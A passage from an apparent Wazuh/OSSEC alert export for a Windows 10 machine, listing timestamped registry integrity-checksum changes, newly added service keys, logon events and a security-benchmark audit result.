'f6949813e6b9d992278b95b7f209e047' +New md5sum is : 'f59a2876dd77ee8c0b8f6fa7297cdf8f' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '0ac7dceee2c501bf3c43ceb5bfb39434d0ce905e' +" +"Apr 7, 2020 @ 09:29:47.928",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : 'e136f27d00387733799ad1811c4f6232' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : '874b705bc209750341c7a9585c13009157bf42bf' +" +"Apr 7, 2020 @ 09:29:47.114",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:47.098",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:46.910",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '997c8620c2190b0bd117790258bc3703' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a01b5b53e6c6cf8c359de7ccd29c696d00b14c47' +" +"Apr 7, 2020 @ 09:29:45.988",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: '06f5c6f330af834dd08ce904d9ae7cc8' +New md5sum is : 'f5ea91602eb594fc2b4973f59a513fcb' +Old sha1sum was: '0cf4c4c19a1201e41b9deba273320298f4f97b50' +New sha1sum is : '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +" +"Apr 7, 2020 @ 09:29:42.489",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '83e44ac722dae2eebc032fde9df5f759' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : 'c454d8444913422a105737f1049f27fdaa4c8f36' +" +"Apr 7, 2020 @ 09:29:40.348",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:29:39.378",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 7, 2020 @ 09:29:37.191",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 7, 2020 @ 09:29:37.175",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '951ed48ea2b16a4b11a3e3fc66e0c792' +New md5sum is : '0dc6107d346e486ffbd805887c817f6a' +Old sha1sum was: '91243c9a9bc671b7729496f2396ac68cf2ac6a62' +New sha1sum is : 'cf56a3f940726a655d5b18eb37e6ad09abcc5392' +" +"Apr 7, 2020 @ 09:29:36.441",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelService 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:36.410",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelOperation 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:36.363",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelEndpoint 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:32.300",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 7, 2020 @ 09:29:30.643",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:30.628",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:29.691",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:29.675",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:28.316",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:28.300",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:25.815",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '810a2698826d8f1b679d50e9b9d557e4' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : 'e8aaa4f248e5f8e1fcecec5191c66118cef34fb2' +" +"Apr 7, 2020 @ 09:29:23.675",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '6d753fa2ef35abd925bd9dcf4dc03096' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '9dd2b15a076fb02ab48d4f71019bd332d54cf2f6' +" +"Apr 7, 2020 @ 09:29:23.534",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSDTC Bridge 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:29:21.175",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'c161d9bd5b6a8cfe80d82ef900158722' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : 'bfc96ff4fe7ac373f7bd4b0a0f216977f6fe0a7e' +" +"Apr 7, 2020 @ 09:29:20.628",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a22d' was added. +" +"Apr 7, 2020 @ 09:29:20.612",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a22d\TriggerInfo\0' was added. +" +"Apr 7, 2020 @ 09:29:20.597",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:29:16.644",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '74d8b67e4f09148a51ac041b5fe1d273' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'bc126e4b3acf98b774af380050065c1bac9c96a9' +" +"Apr 7, 2020 @ 09:29:15.378",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '104defe729ae9bda08ceba8db6011fad' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '35c66a90bf72d1ac3bf30c5ae88e8ea4fbe8fb8c' +" +"Apr 7, 2020 @ 09:29:12.831",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'a0c2b17e4da2d89a30df42e74562f981' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'f683b3c9e8767975381dd8b9181008a14740b34f' +" +"Apr 7, 2020 @ 09:29:12.537",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '104defe729ae9bda08ceba8db6011fad' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '35c66a90bf72d1ac3bf30c5ae88e8ea4fbe8fb8c' +" +"Apr 7, 2020 @ 09:29:11.503",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 7, 2020 @ 09:29:10.816",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:29:03.987",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : 'b438287205551e620ab2c95fcb9f7aec' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : '4f6a91aefc181a8f28ab98b71caf9ee0aea4f342' +" +"Apr 7, 2020 @ 09:28:55.706",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '002fbb6d4418b9fd21624330abf26b96' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '47df610fa011d1737dab6422e726b5ca4854c724' +" +"Apr 7, 2020 @ 09:28:53.909",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.894",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:53.832",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.816",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:53.581",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.566",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:53.362",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:53.347",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:52.863",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:52.847",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:52.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '997c8620c2190b0bd117790258bc3703' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a01b5b53e6c6cf8c359de7ccd29c696d00b14c47' +" +"Apr 7, 2020 @ 09:28:51.300",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:51.270",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:51.128",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:51.112",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:51.050",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:51.034",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:48.909",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:48.894",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\4' was added. +" +"Apr 7, 2020 @ 09:28:48.878",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\3' was added. +" +"Apr 7, 2020 @ 09:28:48.862",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\2' was added. +" +"Apr 7, 2020 @ 09:28:48.847",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\1' was added. +" +"Apr 7, 2020 @ 09:28:48.831",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\TriggerInfo\0' was added. +" +"Apr 7, 2020 @ 09:28:48.815",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:48.691",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +" +"Apr 7, 2020 @ 09:28:47.863",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:47.847",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:47.597",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '6b42f4801651e4d3b137db361363e5bc' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '01e371540c88a9076bfd40a9b78d8b02ac58ed21' +" +"Apr 7, 2020 @ 09:28:47.581",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'e510c2836bdf17e888da83477202fdf2' +New md5sum is : '4d2c8324bc0b4e2640acfce731141287' +Old sha1sum was: '5b0363519c9bfe1d8b5e43ec76b79940f2cbabd8' +New sha1sum is : 'e90edd157b2f05e45cb1d6601c23f8cbe5090510' +" +"Apr 7, 2020 @ 09:28:47.550",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : 'f09e9d80a3ff39b221faf0fd1df28a3d' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '24a3a0c2511e02ee6434188393c0f80a1f57c2da' +" +"Apr 7, 2020 @ 09:28:45.206",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a22d' was added. +" +"Apr 7, 2020 @ 09:28:45.191",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2a22d\Security' was added. +" +"Apr 7, 2020 @ 09:28:39.394",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:56.613",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:27:30.222",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:26.988",3,"Windows User Logoff", +"Apr 7, 2020 @ 09:27:26.972",3,"Windows User Logoff", +"Apr 7, 2020 @ 09:27:26.941",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:26.926",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:25.960",5,"License Activation (slui.exe) failed", +"Apr 7, 2020 @ 09:27:23.566",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 7, 2020 @ 09:27:18.676",3,"The Windows Search Service started", +"Apr 7, 2020 @ 09:27:18.035",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:18.006",3,"The database engine attached a database", +"Apr 7, 2020 @ 09:27:17.822",3,"The database engine is starting a new instance", +"Apr 7, 2020 @ 09:27:16.373",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 7, 2020 @ 09:27:12.845",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:12.801",3,"Windows Workstation Logon Success", +"Apr 7, 2020 @ 09:27:11.901",5,"SessionEnv was unavailable to handle a notification event", +"Apr 7, 2020 @ 09:27:11.363",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 7, 2020 @ 09:27:09.872",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:27:09.136",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 7, 2020 @ 09:26:33.122",5,"SessionEnv was unavailable to handle a notification event", +"Apr 7, 2020 @ 09:26:33.106",5,"WSearch was unavailable to handle a notification event", +"Apr 7, 2020 @ 09:25:48.091",5,"The VSS service is shutting down due to idle timeout", +"Apr 7, 2020 @ 09:25:40.950",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '6f75474aaa9a474cff10b8bd50900934' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'd7d28f2e9d5094b6372ab6f31fa663975676e179' +" +"Apr 7, 2020 @ 09:25:40.919",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '6f75474aaa9a474cff10b8bd50900934' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'd7d28f2e9d5094b6372ab6f31fa663975676e179' +" +"Apr 7, 2020 @ 09:25:40.903",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{FEBEF00C-046D-438D-8A88-BF94A6C9E703}' was added. +" +"Apr 7, 2020 @ 09:25:40.670",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089}' was added. +" +"Apr 7, 2020 @ 09:25:32.901",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Windows Workflow Foundation 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:32.872",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Windows Workflow Foundation 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:25:28.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '02583aa1ae32b1990176644dc3952c81' +New md5sum is : '40f25468dcd84290dd7a261b9ebe519b' +Old sha1sum was: '0ba688310b1196088281fa0da17b1e9c2f96ea7e' +New sha1sum is : '59cbd60494640ca425146424a80456e3bf10847a' +" +"Apr 7, 2020 @ 09:25:28.687",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'd3c3db84b379850af744b570210159ac' +New md5sum is : '61a910cd0eb02db74956a0b4e2c32a83' +Old sha1sum was: '61986d785485024b932a0f9116e6a930eddd2d4b' +New sha1sum is : 'cd9fc634c8dc13de4676ed7f923cc356b262be96' +" +"Apr 7, 2020 @ 09:25:19.817",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:25:13.268",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SMSvcHost 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:13.182",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SMSvcHost 3.0.0.0\Linkage' was added. +" +"Apr 7, 2020 @ 09:25:12.032",3,"Windows Logon Success", +"Apr 7, 2020 @ 09:25:10.975",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System' checksum changed. +Old md5sum was: 'f9c30ebda6d2dc73e07421bea47bcee5' +New md5sum is : '7461912cddc48e370914df96821392af' +Old sha1sum was: 'dcd0971cf15c3492c3db0b73cf973466bb442c96' +New sha1sum is : '34e3062b44f4f79b06af09725959400abdaa422c' +" +"Apr 7, 2020 @ 09:25:10.616",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'bd9b4beaac92fe5749542b077fdeffd0' +New md5sum is : '951ed48ea2b16a4b11a3e3fc66e0c792' +Old sha1sum was: '770460c89c9b82b0c4bc82f78b714a907c62fe5a' +New sha1sum is : '91243c9a9bc671b7729496f2396ac68cf2ac6a62' +" +"Apr 7, 2020 @ 09:25:09.270",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelService 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:09.246",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelOperation 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:25:09.237",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceModelEndpoint 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:24:53.130",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSDTC Bridge 3.0.0.0\Performance' was added. +" +"Apr 7, 2020 @ 09:24:42.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FontCache3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:42.642",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FontCache3.0.0.0\Security' was added. +" +"Apr 7, 2020 @ 09:24:40.940",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\System\SMSvcHost 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:39.784",3,"Software Protection service scheduled successfully", +"Apr 7, 2020 @ 09:24:38.721",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\System\MSDTC WS-AT Protocol' was added. +" +"Apr 7, 2020 @ 09:24:38.644",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\System\MSDTC Gateway' was added. +" +"Apr 7, 2020 @ 09:24:31.581",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Security\ServiceModel 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.393",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.ServiceModel 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.378",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.Runtime.Serialization 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.362",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.IO.Log 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:31.346",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\System.IdentityModel 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:30.315",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\ServiceModel Audit 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:30.253",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\Microsoft.Transactions.Bridge 3.0.0.0' was added. +" +"Apr 7, 2020 @ 09:24:27.815",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\Application\ASP.NET 2.0.50727.0' was added. +" +"Apr 7, 2020 @ 09:24:22.990",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\clr_optimization_v2.0.50727_64' was added. +" +"Apr 7, 2020 @ 09:24:22.974",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\clr_optimization_v2.0.50727_32' was added. +" +"Apr 7, 2020 @ 09:24:16.946",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '5a39cd62b5ce5f55c1fc9302fe23485c' +New md5sum is : 'e510c2836bdf17e888da83477202fdf2' +Old sha1sum was: 'de83c0bb18a5c320f0a1adb8c5dab09d7be63679' +New sha1sum is : '5b0363519c9bfe1d8b5e43ec76b79940f2cbabd8' +" +"Apr 7, 2020 @ 09:24:12.330",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET CLR Networking\Performance' checksum changed. +Old md5sum was: 'c9339e2022b419c80316c1973733b12b' +New md5sum is : 'c6ee36dd578cc295e6e7873d06f20236' +Old sha1sum was: '42a5ef8d2e511d73acbe97a1589613afc16099c9' +New sha1sum is : 'b5518c6da94b7f3ab25c6e199cef22df5a02ef16' +" +"Apr 7, 2020 @ 09:24:12.316",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\.NET 